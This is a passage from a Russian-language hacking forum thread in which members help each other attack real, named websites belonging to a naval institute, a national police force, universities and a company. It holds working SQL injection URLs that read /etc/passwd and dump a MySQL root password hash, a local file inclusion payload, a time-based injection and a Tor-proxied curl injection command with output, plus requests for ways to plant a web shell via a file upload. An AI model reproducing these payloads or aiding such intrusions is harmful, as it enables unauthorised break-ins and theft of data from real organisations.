Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    297
    Likes Received:
    89
    Reputations:
    1
    Как отфильтровать сайты в burpsuite? отображать только домен и его поддомены не зависимо от https/http
    http://joxi.ru/GrqMLEyHQN0GLr
     
  2. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    #1462 DezMond™, 4 Nov 2016
    Last edited: 4 Nov 2016
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Всем привет. Стыдно конечно спрашивать но всё же век живи, век учись

    1 -
    PHP:
    http://www.naval.iitkgp.ernet.in/menu.php?page=pagedisplay&id=mission%27+and+false+UnioN+SeLect+1,user(),3,4,5,6,7,8,9,10,11,12+--+-
    2-
    PHP:
    http://www.police.gov.bd/Police-activities.php?id=271%27+and+false+UnIoN+SeLecT+1,2,user(),4,5,6,7,8,9,10,11,12,13,14,15,16++--+-
    как прочитать файл
     
  4. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    LOAD_FILE('/etc/passwd') вместо user()
     
  5. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    1
    http://www.naval.iitkgp.ernet.in/me...file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12--+
    или
    http://www.naval.iitkgp.ernet.in/me...74632F706173737764),3,4,5,6,7,8,9,10,11,12--+
    где 0x2F6574632F706173737764= hex(/etc/passwd)

    2
    нет доступа к mysql.user то есть нет возможности прочитать файл,несмотря на то что пользователь root, root'ом не является
     
  6. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    havij видит что то http://prnt.sc/d3e4kj
    но увы mysql=4.0.27
    в ручную пока не могу составить запрос
     
  7. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    http://www.naval.iitkgp.ernet.in/me...rd),3,4,5,6,7,8,9,10,11,12+from+mysql.user--+
    root:*29EAFC3EEB29D66A3630CAA03C557B3083B2975B
    всё там нормально
     
  8. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Это я видел. Должен быть вывод....
     
  9. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  10. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Спасибо кто откликнулся.
    В первом сайте интересен запрос table_name from information_schema.tables where table_name=database()/
    в втором сайте интересней чтение файла. Сори а то что сразу не смог задать нормально вопрос.
     
  11. IMMORTAL_S

    IMMORTAL_S Member

    Joined:
    29 Apr 2010
    Messages:
    129
    Likes Received:
    9
    Reputations:
    2
    Всем привет!

    На странице есть ckeditor с возможностью загружать файлы на сервер.
    - заливать можно всё
    - имена файлов переименовывается, так что залить .htaccess не получится
    - имена после заливки известны
    - php, php3, phtml (возможно и другие, больше не пробовал, боюсь мою кучу говна скоро обнаружат) не выполняются, скачиваются
    - shtml открывается, но так же не выполняется (судя по всему там хрен что выполняется)

    Свои идеи иссякли, а останавливаться на достигнутом не хочется, так что прошу поделиться идеями, размышлениями на тему заливки рабочего шелла и т.п. вещей.
    Не уверен что с html+js можно что-то придумать, может какой perl сгодится или еще что, но в этом я уже не силен.

    Да кстати, хоть ckeditor версии 4.0.1, толку от этого нет, т.к. папка samples отсутствует.
    И еще проверил pl, чтоб наверняка, тоже понятное дело скачивается.
     
    #1471 IMMORTAL_S, 8 Nov 2016
    Last edited: 8 Nov 2016
  12. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    306
    Likes Received:
    138
    Reputations:
    33
    Помогите раскрутить LFI
    _ttp://lidodo.astro.ncu.edu.tw/2015ATITC/index.php?page=../../../etc/passwd
     
  13. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
    ?page=file:///etc/passwd
     
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Вроде как указал автор работает. Не очень понятно что требуется
     
  15. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
  16. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    _________________________
  17. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
  18. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Неужели ты эту уязвимость раскрутил
    http://icfi.ulim.md/alltopics.php?cat=sleep(12)
    Поищи тут может найдёшь, я думаю она где-то спрятана
    ftp.ulim.md
    moodle.ulim.md
    git.ulim.md
    gw.ulim.md
    domain.ulim.md
    files.ulim.md
    redmine.ulim.md
    s.ulim.md
    vm.ulim.md
     
  19. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    #1479 BabaDook, 10 Nov 2016
    Last edited: 10 Nov 2016
  20. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    curl -s -k --proxy socks5://127.0.0.1:9150 -A 'mozilla' 'http://www.caresoft.ind.in/info.php' --data 'show=185+union+select+1,2,3,4,concat(999,char(58),version()),6,7+--+s'  | grep 999
              <td width="100%" class="text">999:5.1.68-community</td>
    
     
    _________________________
    BabaDook likes this.